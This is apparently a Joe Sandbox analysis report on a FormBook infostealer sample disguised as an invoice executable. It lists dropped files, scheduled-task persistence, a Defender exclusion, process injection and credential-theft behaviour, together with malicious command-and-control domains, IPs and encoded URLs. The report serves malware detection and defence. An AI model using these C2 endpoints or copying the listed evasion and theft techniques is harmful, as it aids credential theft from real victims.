            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527933 Sample: z1SupplyInvoiceCM60916_Doc.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 54 www.golizle22.xyz 2->54 56 www.booosted.xyz 2->56 58 22 other IPs or domains 2->58 70 Suricata IDS alerts for network traffic 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 Sigma detected: Scheduled temp file as task from temp location 2->74 78 7 other signatures 2->78 10 z1SupplyInvoiceCM60916_Doc.exe 7 2->10         started        14 dpqsbGoWdXlp.exe 5 2->14         started        signatures3 76 Performs DNS queries to domains with low reputation 56->76 process4 file5 48 C:\Users\user\AppData\...\dpqsbGoWdXlp.exe, PE32 10->48 dropped 50 C:\Users\user\AppData\Local\...\tmp68D8.tmp, XML 10->50 dropped 52 C:\...\z1SupplyInvoiceCM60916_Doc.exe.log, ASCII 10->52 dropped 80 Uses schtasks.exe or at.exe to add and modify task schedules 10->80 82 Adds a directory exclusion to Windows Defender 10->82 16 z1SupplyInvoiceCM60916_Doc.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        84 Multi AV Scanner detection for dropped file 14->84 25 schtasks.exe 14->25         started        27 dpqsbGoWdXlp.exe 14->27         started        signatures6 process7 signatures8 66 Maps a DLL or memory area into another process 16->66 29 IEFVDUdSaLLhw.exe 16->29 injected 68 Loading BitLocker PowerShell Module 19->68 33 WmiPrvSE.exe 19->33         started        35 conhost.exe 19->35         started        37 conhost.exe 21->37         started        39 conhost.exe 23->39         started        41 conhost.exe 25->41         started        process9 dnsIp10 60 wonders8.live 119.18.54.27, 49969, 49987, 49992 PUBLIC-DOMAIN-REGISTRYUS India 29->60 62 www.sellvolt.life 209.74.64.190, 50023, 50024, 50025 MULTIBAND-NEWHOPEUS United States 29->62 64 7 other IPs or domains 29->64 94 Found direct / indirect Syscall (likely to bypass EDR) 29->94 43 svchost.exe 13 29->43         started        signatures11 process12 signatures13 86 Tries to steal Mail credentials (via file / registry access) 43->86 88 Tries to harvest and steal browser information (history, passwords, etc) 43->88 90 Modifies the context of a thread in another process (thread injection) 43->90 92 2 other signatures 43->92 46 firefox.exe 43->46         started        process14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            z1SupplyInvoiceCM60916_Doc.exe47%ReversingLabsWin32.Backdoor.FormBook

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe47%ReversingLabsWin32.Trojan.Generic

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.sellvolt.life
            		209.74.64.190
            		truetrue
              		unknown
              booosted.xyz
              		3.33.130.190
              		truetrue
                		unknown
                nieuws-july202491.sbs
                		162.0.215.33
                		truetrue
                  		unknown
                  kk88.live
                  		68.178.233.113
                  		truetrue
                    		unknown
                    www.kuaimaolife.shop
                    		38.55.251.233
                    		truetrue
                      		unknown
                      whiterabbitgroup.pro
                      		3.33.130.190
                      		truetrue
                        		unknown
                        www.golizle22.xyz
                        		104.21.5.125
                        		truetrue
                          		unknown
                          cablecarrental.net
                          		3.33.130.190
                          		truetrue
                            		unknown
                            nieuws-july202541.sbs
                            		162.0.215.33
                            		truetrue
                              		unknown
                              www.acuarelacr.buzz
                              		161.97.168.245
                              		truetrue
                                		unknown
                                gegeesthreadworks.info
                                		3.33.130.190
                                		truetrue
                                  		unknown
                                  wonders8.live
                                  		119.18.54.27
                                  		truetrue
                                    		unknown
                                    impulsarnegocios.info
                                    		3.33.130.190
                                    		truetrue
                                      		unknown
                                      www.meliorahomes.net
                                      		8.217.17.192
                                      		truetrue
                                        		unknown
                                        www.booosted.xyz
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.impulsarnegocios.info
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.whiterabbitgroup.pro
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.gegeesthreadworks.info
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.nieuws-july202541.sbs
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.cablecarrental.net
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.o30cf998d.cfd
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.wonders8.live
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.nieuws-july202491.sbs
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.kk88.live
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown

                                                            Contacted URLs

                                                            NameMaliciousAntivirus DetectionReputation
                                                            http://www.nieuws-july202541.sbs/odii/true
                                                              		unknown
                                                              http://www.booosted.xyz/spso/true
                                                                		unknown
                                                                http://www.gegeesthreadworks.info/8blm/?ej6Le=HSrh+kNg29vzDhmFvPtm7umcbnSkD02Ywpq4W1dSB1gaYliK2tVtZVmlspEFfRCsj7T0RA4zUvJ1xW3xieZGFm3Omt7rhJzIl1qpMMAhzN+EcK1k2mGj+1ZxR4qvhmW1pUGTA/Y=&An=mLdxo2Y8RLRhtrue
                                                                  		unknown
                                                                  http://www.kk88.live/m1w5/?ej6Le=3rMHf/BSjWsGYHwCFDyQr7UpHD469M8Ow0JV4TmI6XMWIkQCx3J07rEG1KeFsj1Bt3GmHG0JhP0iSMuoC4YaBVBwifK18YsKoqHqcY+PGErO86AoCrs033ftT3/LwHGHiZtPsOM=&An=mLdxo2Y8RLRhtrue
                                                                    		unknown
                                                                    http://www.sellvolt.life/dbaa/true
                                                                      		unknown
                                                                      http://www.cablecarrental.net/g5rn/?ej6Le=g7r8ZVC0cxJrkvwRypX7ol6hCzLGk0q5Jh6A3BrwknfWwIjVhyX9x4N34a97pOgSsNGPocoejkJQBdcVqC7tK2vQwMKTMeAj0+OVYz2VfmsetKnlMlSnUnOZTT0AV1eZjywajZ8=&An=mLdxo2Y8RLRhtrue
                                                                        		unknown
                                                                        http://www.sellvolt.life/dbaa/?ej6Le=k+2h99XjzdZ+a8Guk9H+DZKAegT3yZPFsem4T4eX/urocpQMmPRl+MIiB7TuMhw38cELxfo4GPEke8/YGnuBTMId45zKJfXr14lU8gtHFAMAaoG54zLZ3lT6+2fSDV7gKgn9GEE=&An=mLdxo2Y8RLRhtrue
                                                                          		unknown
                                                                          http://www.whiterabbitgroup.pro/woyi/?An=mLdxo2Y8RLRh&ej6Le=liT4ZvY+2rzgu/UySgm47PML3ORjyZfCr6UpwpMzCweBEUZYpuqhq1mvJHjke4Uqr9Ttl6ktg6VhmA6yP/C42/0uWdACaDjPwlAEpqkr1rm8nQp5jQDy/v7kwBfcS6SUx+7tvUI=true
                                                                            		unknown
                                                                            http://www.meliorahomes.net/x0tl/true
                                                                              		unknown
                                                                              http://www.booosted.xyz/spso/?ej6Le=tFeIgmxzndAX18VLtJk/zbNv0lImNRb288p8UUCUbjDyDydKnVlzDYJug8WZqOAMxfoP9GMdNXzPVq95XWLVPrBzbN/BvIU7kFB3pLyGJrR2t8RTUX3UsiymoOhQ+PD/dlbX4PM=&An=mLdxo2Y8RLRhtrue
                                                                                		unknown
                                                                                http://www.kuaimaolife.shop/9wb2/true
                                                                                  		unknown
                                                                                  http://www.acuarelacr.buzz/epk2/true
                                                                                    		unknown
                                                                                    http://www.golizle22.xyz/kpbt/?An=mLdxo2Y8RLRh&ej6Le=bzS3m8wIdYLAo6JC2B8v6DjkcYKoJ+/o0NmGFeD5SFiVCQOeD71i1fiBX/Z3MR+4fZ4gDTM+AXXLFXHhSs/mG9Ow8FixmQY8Mzsb0tyXAIso2XGTy+nTpErXCIb5tNtL4I1fOo4=true
                                                                                      		unknown
                                                                                      http://www.nieuws-july202541.sbs/odii/?ej6Le=dVBn/8h3nxQ+NW3HHa2Dil9IxOpuSbZnLfq0vBwwz2PjK6Osa+4r5Mmz4BUq4xUHF4JCazXFRId1LoC3dnRZfR9dh4rO42NOGnzVyjLt/mUqEpvHWr7qJMesP485wi7mHEQ5T/k=&An=mLdxo2Y8RLRhtrue
                                                                                        		unknown
                                                                                        http://www.nieuws-july202491.sbs/rq5n/true
                                                                                          		unknown
                                                                                          http://www.wonders8.live/ctxc/?ej6Le=zdjwxosx+nYBz3+zbsBPWm+/7ve+ekB9VgYRIagILtbm8OwwRgMV6Kxr3Il58QUpA1eFuFbhbn4bqlVkjsdXtj71u+jihQLEfVmONzp8WE9uDtKzy1Bx2zuvnmoFIjKdlKtQFkI=&An=mLdxo2Y8RLRhtrue
                                                                                            		unknown
                                                                                            http://www.golizle22.xyz/kpbt/true
                                                                                              		unknown
                                                                                              http://www.acuarelacr.buzz/epk2/?ej6Le=5hSJrytQEf2r193N2AyKKNas1p8do7y+C8hF198jiQrVzRfSjh9C72xB1f8gK0fXwE+oGLvPau9gCypTG2u5T5i3An2mBAgKXA59UHv+xIL7sVXWIuP/SFcs74Xei//AEoJSK5E=&An=mLdxo2Y8RLRhtrue
                                                                                                		unknown
                                                                                                http://www.cablecarrental.net/g5rn/true
                                                                                                  		unknown
                                                                                                  http://www.gegeesthreadworks.info/8blm/true
                                                                                                    		unknown
                                                                                                    http://www.kk88.live/m1w5/true
                                                                                                      		unknown
                                                                                                      http://www.meliorahomes.net/x0tl/?An=mLdxo2Y8RLRh&ej6Le=9tQWqttnWu7MjGZLyiEcCzdUDF7UN3PBgIeLryHozuROP/1ck4METjVt2AM5oXaP3hSOrK+o7VaG5j6GesXwOMuHrEAdecfGMf0B1/a+f8XsVC4h6LXHmO6QOE5KLV0/obdy6xQ=true
                                                                                                        		unknown
                                                                                                        http://www.impulsarnegocios.info/fp1z/?ej6Le=UM9JF3nEU4xQ/PwLWGC6ZGprDkqeXDETquU6+bQNCANtrDf9n2+FDVI8iqG/UPksDfc6HQNuzTnZ4EJOssmSqFcoG0I3gKiI2YTwSr3+9s/MRsmHXzjzE9U3d6U0PlwuaFK3vCk=&An=mLdxo2Y8RLRhtrue
                                                                                                          		unknown
                                                                                                          http://www.wonders8.live/ctxc/true
                                                                                                            		unknown
                                                                                                            http://www.impulsarnegocios.info/fp1z/true
                                                                                                              		unknown
                                                                                                              http://www.kuaimaolife.shop/9wb2/?ej6Le=5UlEP0kDVMW/PPEwoDc70sMozoicrCD3NhlqEuGPGOUFJHosOZBhD6Eku4DzDmeGf+gBdkEGC1Jne06x+N2lRr6ZxBLzarbPmMoZ56wq7frcAS7q07bHFFW9m+jVLfRUYpA8+/U=&An=mLdxo2Y8RLRhtrue
                                                                                                                		unknown

                                                                                                                URLs from Memory and Binaries

                                                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                http://cdn.jsinit.directfwd.com/sk-jspark_init.phpIEFVDUdSaLLhw.exe, 0000000D.00000002.4584961050.00000000054B6000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.00000000040A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://duckduckgo.com/chrome_newtabsvchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://duckduckgo.com/ac/?q=svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icosvchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://tempuri.org/kursovaSQLDataSet.xsdz1SupplyInvoiceCM60916_Doc.exe, dpqsbGoWdXlp.exe.0.drfalse
                                                                                                                      		unknown
                                                                                                                      https://www.ecosia.org/newtab/svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://ac.ecosia.org/autocomplete?q=svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.meliorahomes.netIEFVDUdSaLLhw.exe, 0000000D.00000002.4587208123.0000000007422000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referIEFVDUdSaLLhw.exe, 0000000D.00000002.4584961050.000000000678E000.00000004.80000000.00040000.00000000.sdmp, IEFVDUdSaLLhw.exe, 0000000D.00000002.4584961050.000000000596C000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.000000000537E000.00000004.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.000000000455C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsvchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namez1SupplyInvoiceCM60916_Doc.exe, 00000000.00000002.2200567149.00000000034D4000.00000004.00000800.00020000.00000000.sdmp, dpqsbGoWdXlp.exe, 0000000C.00000002.2342313446.0000000002A24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=svchost.exe, 0000000F.00000003.2478216716.0000000008136000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown

                                                                                                                          World Map of Contacted IPs

                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs

                                                                                                                          Public IPs

                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          162.0.215.33
                                                                                                                          		nieuws-july202491.sbsCanada
                                                                                                                          		35893ACPCAtrue
                                                                                                                          104.21.5.125
                                                                                                                          		www.golizle22.xyzUnited States
                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                          8.217.17.192
                                                                                                                          		www.meliorahomes.netSingapore
                                                                                                                          		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                          68.178.233.113
                                                                                                                          		kk88.liveUnited States
                                                                                                                          		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                          119.18.54.27
                                                                                                                          		wonders8.liveIndia
                                                                                                                          		394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                                                                                          38.55.251.233
                                                                                                                          		www.kuaimaolife.shopUnited States
                                                                                                                          		174COGENT-174UStrue
                                                                                                                          209.74.64.190
                                                                                                                          		www.sellvolt.lifeUnited States
                                                                                                                          		31744MULTIBAND-NEWHOPEUStrue
                                                                                                                          3.33.130.190
                                                                                                                          		booosted.xyzUnited States
                                                                                                                          		8987AMAZONEXPANSIONGBtrue
                                                                                                                          161.97.168.245
                                                                                                                          		www.acuarelacr.buzzUnited States
                                                                                                                          		51167CONTABODEtrue

                                                                                                                          General Information

                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                          Analysis ID:1527933
                                                                                                                          Start date and time:2024-10-07 12:32:07 +02:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 11m 49s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:23
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:1
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:z1SupplyInvoiceCM60916_Doc.exe
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@23/16@15/9
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 92%
                                                                                                                          • Number of executed functions: 175
                                                                                                                          • Number of non-executed functions: 286
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                          Warnings

                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • VT rate limit hit for: z1SupplyInvoiceCM60916_Doc.exe

                                                                                                                          Simulations

                                                                                                                          Behavior and APIs

                                                                                                                          TimeTypeDescription
                                                                                                                          06:32:59API Interceptor1x Sleep call for process: z1SupplyInvoiceCM60916_Doc.exe modified
                                                                                                                          06:33:05API Interceptor49x Sleep call for process: powershell.exe modified
                                                                                                                          06:33:10API Interceptor1x Sleep call for process: dpqsbGoWdXlp.exe modified
                                                                                                                          06:33:53API Interceptor14165409x Sleep call for process: svchost.exe modified
                                                                                                                          12:33:07Task SchedulerRun new task: dpqsbGoWdXlp path: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe

                                                                                                                          Joe Sandbox View / Context

                                                                                                                          IPs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          8.217.17.192shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • www.meliorahomes.net/v6hi/
                                                                                                                          119.18.54.27Compensation-1061613036.xlsGet hashmaliciousUnknownBrowse
                                                                                                                            Compensation-1061613036.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              38.55.251.233SOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.kuaimaolife.shop/j39u/
                                                                                                                              Narudzba ACH0036173.vbeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                              • www.kuaimaolife.shop/80e1/
                                                                                                                              Revised Invoice H000127896.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.kuaimaolife.shop/j39u/
                                                                                                                              3.33.130.190SOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.ara-store.com/vbsv/
                                                                                                                              Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.dto20.shop/qt7h/
                                                                                                                              Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.platinumkitchens.info/nkwh/
                                                                                                                              Proforma szamla csatolva.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.anavamarketing.com/iat1/
                                                                                                                              PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.airtech365.net/i5ct/
                                                                                                                              UPDATED Q-LOT24038.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.theclydefund.info/pt4m/
                                                                                                                              -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.greekhause.org/phvf/
                                                                                                                              rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                              • www.nuvsgloves.shop/211a/
                                                                                                                              hH4dbIGfGT.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.mgeducacaopro.online/p2x3/
                                                                                                                              Fvqw64NU4k.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • www.mayawashfold.net/k7qa/

                                                                                                                              Domains

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              www.meliorahomes.netshipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 8.217.17.192
                                                                                                                              www.kuaimaolife.shopSOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 38.55.251.233
                                                                                                                              Narudzba ACH0036173.vbeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                              • 38.55.251.233
                                                                                                                              Revised Invoice H000127896.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 38.55.251.233
                                                                                                                              www.acuarelacr.buzzSOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 161.97.168.245

                                                                                                                              ASNs

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              CLOUDFLARENETUSrREQUESTFORQUOTE-INQUIRY87278.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 188.114.97.3
                                                                                                                              https://kohlhage-de.powerappsportals.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                              • 104.21.34.55
                                                                                                                              High Court Summons Notice.pdfGet hashmaliciousUnknownBrowse
                                                                                                                              • 172.65.208.22
                                                                                                                              https://kohlhage-de.powerappsportals.com/Get hashmaliciousHtmlDropperBrowse
                                                                                                                              • 104.18.3.157
                                                                                                                              cfev.-Information refb08b4d10f3ce74a317adeabab8ac66ad.htmGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.21.26.253
                                                                                                                              SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.20.23.46
                                                                                                                              SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 172.67.19.24
                                                                                                                              SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 172.67.19.24
                                                                                                                              SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.20.22.46
                                                                                                                              https://tampoesdeferrofundido.com.br/redirect.php?v=2455b0ad034ad02Get hashmaliciousUnknownBrowse
                                                                                                                              • 1.1.1.1
                                                                                                                              AS-26496-GO-DADDY-COM-LLCUSFarahexperiences.com_Report_87018.pdfGet hashmaliciousUnknownBrowse
                                                                                                                              • 72.167.52.82
                                                                                                                              Farahexperiences.com_Report_52288.pdfGet hashmaliciousUnknownBrowse
                                                                                                                              • 72.167.52.82
                                                                                                                              z3hir.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 173.201.204.199
                                                                                                                              http://www.sms22.com/images/flog/delivery/tracking.phpGet hashmaliciousUnknownBrowse
                                                                                                                              • 192.169.232.76
                                                                                                                              http://www.floridavacationrentalsbyowners.com/uploads/1045/Info/page_settings/account.phpGet hashmaliciousUnknownBrowse
                                                                                                                              • 198.12.255.236
                                                                                                                              z1PurchaseOrder.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 166.62.28.135
                                                                                                                              Reff_Daiichi-sankyo_8580930869_n6T8Tseqk6.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 72.167.142.137
                                                                                                                              Your Document-7617432882-8AhEHNmrLR Ready.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 72.167.142.137
                                                                                                                              5.dllGet hashmaliciousUnknownBrowse
                                                                                                                              • 208.109.246.134
                                                                                                                              shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 118.139.176.2
                                                                                                                              ACPCAna.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 162.54.91.6
                                                                                                                              http://x3viswxo.clinicaimplantologica3d.com/Get hashmaliciousUnknownBrowse
                                                                                                                              • 162.55.236.225
                                                                                                                              arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                              • 162.64.49.51
                                                                                                                              https://click.agilitypr.delivery/ls/click?upn=u001.eiLrPCkKKjApnPIr0I-2BsRfkpzjEGhTCoHqG09iolrdhlMYGCOo2Nd-2FxjkEBEx2ILarmVrzugxvL3mzK8oRbzmw-2Fc8MlnUZ-2Fr7oFdK8O5ZPNkRNGBT2B5w7-2BPGYsDVJaX7Ju4_CsMjdMvVCH8VnXX4Gfqu2d-2F8dUxANUAZ6i0guRxOZ16SBn-2BfWKPYCJ4k-2FRayz-2B7dgj-2Fry3pp6bh27tMOonGdCv5tjKX-2BF3xoFuSqeM2q0ggzsiKdwHoy3hTh08ynmZWbcBa2wQancmLCRha7gIvuGF-2BaYXuvGrIxnmpxoXmMm6ir51qvGKOvNKdK5IH4SYf35X5Wd-2Fs6YZWP8vKqWmGP1KToK5-2FGS-2BKn-2Bf84fcBuTdvvkjO8NEF5Bpt9hfpdVjRN-2FV0yMk97PXeyRMLgSEmwvvB4CTAjLo1gEwkG7vxhEAXXg1bNDHaxOZEzcIkoAbp8oMfK5YrMDngcc0JjC3pXeoycPv9IyLICjZ-2BgbU8HA-2BOjvDkAcylLxTWsU8lsqYTGnTfslidP4BMlB0nIxXCbcq4-2FLoVs6F-2Fhdrhdj9zy6VM-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 162.55.246.61
                                                                                                                              PROFORMA INVOICE.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                              • 162.55.60.2
                                                                                                                              BANK STATEMENT REPORT.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                              • 162.55.60.2
                                                                                                                              https://www.afghanhayatrestaurant.com.au/Get hashmaliciousUnknownBrowse
                                                                                                                              • 162.0.209.239
                                                                                                                              https://contact-us-business-help-home-64844114956.on-fleek.app/Get hashmaliciousUnknownBrowse
                                                                                                                              • 162.55.51.87
                                                                                                                              https://dreativityblocksnodes.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                                              • 162.55.120.196
                                                                                                                              https://247-dapprectify.pages.dev/wallet/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                              • 162.55.233.28
                                                                                                                              CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdChttps://gtm.you1.cn/app/381210Get hashmaliciousUnknownBrowse
                                                                                                                              • 47.57.186.72
                                                                                                                              na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                              • 47.255.177.103
                                                                                                                              na.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 8.221.121.89
                                                                                                                              http://ipfs.io/ipfs/bafybeidgkzr2gy7npe4yonk6p7s4chmwvgd2cp7bk7u6llfwiutgvt77tqGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 47.246.131.28
                                                                                                                              na.elfGet hashmaliciousMiraiBrowse
                                                                                                                              • 47.91.26.168
                                                                                                                              https://us-usps-vpoktn.xyz/update/Get hashmaliciousUnknownBrowse
                                                                                                                              • 47.252.21.175
                                                                                                                              https://us-usps-zguvhm.xyz/update/Get hashmaliciousUnknownBrowse
                                                                                                                              • 47.252.21.175
                                                                                                                              https://swiftclaimairdropmeta.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 47.253.61.56
                                                                                                                              http://pancakeswaplogin.educatorpages.com/Get hashmaliciousUnknownBrowse
                                                                                                                              • 47.253.61.56
